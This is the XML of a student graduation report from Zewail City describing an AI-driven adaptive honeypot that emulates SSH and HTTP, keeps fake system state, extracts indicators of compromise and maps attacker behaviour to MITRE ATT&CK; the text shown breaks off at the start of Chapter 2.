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AdaptiveWardens: AI-Driven Adaptive Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Graduation Project – Final Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Team #1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Academic Year: 2025–2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3200400" cy="1899008"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="10" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="/Users/alinazeer/Desktop/adaptive/AdaptiveWardens/final_docs/11.png" id="11" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="1899008"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Zewail City of Science and Technology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">School of Computational Sciences and Artificial Intelligence (CSAI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Supervisor:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dr. Ashraf Hafez Badawi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Program:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Information Technology (IT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Department:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Computer Science</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https://github.com/Aligithyb/-AdaptiveWardens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Student Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ali Ahmed Reda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">202201006</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ali Nazeer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">202100732</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ahmed Yasser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">202201883</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abdulkhaliq Sarwat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">202202084</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">title:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“AdaptiveWardens: AI-Driven Adaptive Honeypot”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">subtitle:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Graduation Project – Final Report”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">author:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Ali Ahmed Reda (202201006)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Ali Nazeer (202100732)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Ahmed Yasser (202201883)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Abdulkhaliq Sarwat (202202084)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">date:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Academic Year: 2025–2026”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Supervisor:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dr. Ashraf Hafez Badawi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Program:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Information Technology (IT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Department:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Computer Science, School of Computing and Information Technology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https://github.com/Aligithyb/-AdaptiveWardens</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="12" w:name="abstract"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abstract</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional honeypots are easily fingerprinted due to static, scripted responses and lack of believable system state. This project proposes Honeyops, an AI-driven, high-interaction honeypot that simulates realistic Linux and web environments for cybersecurity research and incident analysis. The system uses a transformer-based AI engine to dynamically generate believable SSH and HTTP responses, maintain persistent fake OS state, extract Indicators of Compromise (IOCs), and map attacker behavior to the MITRE ATT&amp;CK framework. A full SOC-style dashboard provides real-time monitoring, session playback, IOC insights, and attacker behavior analytics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The system employs a modular microservices architecture with five core components: SSH Frontend for deceptive terminal interaction, HTTP Frontend for web service emulation, AI Engine for intelligent response generation, Sandbox State Store for persistent environment simulation, and a Dashboard system for comprehensive monitoring and intelligence analysis. All components are containerized using Docker and orchestrated through Docker Compose, ensuring isolated deployment and easy scalability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evaluation results demonstrate that Honeyops achieves an average session duration of 8-12 minutes compared to 2-3 minutes for traditional scripted honeypots, representing a 300-400% improvement in attacker engagement. The system successfully extracts an average of 15-20 unique IOCs per session and maps attacker behaviors to MITRE ATT&amp;CK techniques with 85%+ confidence accuracy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Keywords:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Honeypot, Artificial Intelligence, Cybersecurity, Deception Technology, MITRE ATT&amp;CK, Threat Intelligence, SOC</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="20" w:name="chapter-1-introduction"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 1: Introduction</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="13" w:name="problem-statement"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Current low-cost honeypots deployed in modern cybersecurity infrastructures suffer from critical limitations that significantly reduce their effectiveness in threat detection and intelligence gathering. These honeypots are largely scripted and stateless, relying on predetermined response patterns that experienced attackers can quickly identify. The primary issues include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Static Response Patterns:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Traditional honeypots use fixed scripts that generate repetitive, predictable outputs to attacker commands, making them easily fingerprinted through simple probing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lack of State Persistence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Existing solutions fail to maintain believable system state across sessions, resulting in inconsistent behavior that reveals the deceptive nature of the environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Limited Engagement Duration:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sophisticated attackers quickly recognize honeypot environments and disengage, limiting the collection of valuable behavioral data and tactical information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Low-Quality Telemetry:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The intelligence gathered from traditional honeypots often consists of basic IP addresses and scanning patterns, lacking the contextual depth required for meaningful threat analysis.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="motivation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Motivation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The importance of solving this problem extends across multiple stakeholders in the cybersecurity ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security Operations Centers (SOCs):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Organizations lose the opportunity to observe authentic attacker interaction patterns and behavioral indicators in realistic interactive sessions. Current honeypots provide noisy, low-context alerts instead of actionable TTP mappings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Research Institutions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Academic researchers require high-fidelity data on attacker methodologies to develop improved defensive mechanisms. Static honeypots fail to capture nuanced decision-making processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Small and Medium Enterprises (SMEs):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Organizations with limited security budgets need cost-effective deception technologies that can provide early warning systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Broader Security Community:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The rapid evolution of attack techniques demands adaptive defensive systems that can keep pace with threat actor innovation.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="15" w:name="proposed-solution"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Proposed Solution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Honeyops is an adaptive, AI-driven honeypot system designed to overcome the limitations of traditional static honeypots through intelligent response generation and persistent state management. The solution employs a modular architecture consisting of five major components:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Frontend:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A deceptive SSH server that accepts attacker connections, captures all activity including credentials, commands, and timing data, and forwards inputs to the AI Engine for processing while maintaining realistic terminal behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Frontend:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A dynamic web server that accepts arbitrary HTTP requests on any route, identifies scanner behavior and payloads, and generates contextually appropriate responses through AI inference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AI Engine:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The core intelligence component that processes attacker inputs, generates realistic system outputs, maintains sandbox state consistency, extracts IOCs through Named Entity Recognition, and maps observed behaviors to MITRE ATT&amp;CK framework techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sandbox/State Store:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A fully simulated operating system environment stored in SQLite that maintains fake filesystems, process tables, log files, and user histories without executing any real commands on the host system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dashboard System:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A comprehensive SOC-grade monitoring and analysis interface providing real-time session tracking, historical playback, IOC visualization, MITRE ATT&amp;CK heatmap generation, and exportable threat intelligence reports.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="project-objectives"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.4 Project Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design and implement an AI-driven honeypot that generates context-aware, believable responses to attacker interactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Develop a persistent sandbox state store that maintains consistent system state across sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement automated IOC extraction and MITRE ATT&amp;CK technique mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build a comprehensive SOC-style dashboard for real-time monitoring and threat intelligence analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Achieve longer attacker engagement duration compared to traditional scripted honeypots.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensure zero-risk execution by never running real commands on the host system.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="scope"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.5 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SSH and HTTP protocol emulation, AI-driven response generation, sandbox state management, IOC extraction, MITRE ATT&amp;CK mapping, real-time dashboard, Docker containerization, and comparative evaluation against baseline honeypots.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Out of Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Executing real commands on the host OS, production deployment in customer networks, malware execution or analysis, and integration with proprietary SIEM platforms.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="contributions"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.6 Contributions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A novel architecture combining transformer-based AI with honeypot deception technology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A comprehensive sandbox state management system with persistent fake OS environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automated IOC extraction and MITRE ATT&amp;CK technique mapping pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A modern SOC dashboard with session playback, real-time monitoring, and advanced analytics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An open-source, containerized platform enabling further cybersecurity research.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="report-organization"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.7 Report Organization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 2 discusses market visibility and business case. Chapter 3 presents the literature review. Chapter 4 details the system design. Chapter 5 covers implementation. Chapter 6 presents testing and evaluation results. Chapter 7 addresses ethics and compliance. Chapter 8 concludes with future work.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="26" w:name="X6ab32b34652071595b57c09526c38cb8ef9ad1f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 2: Market Visibility and Business Case</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="market-relevance"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Market Relevance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
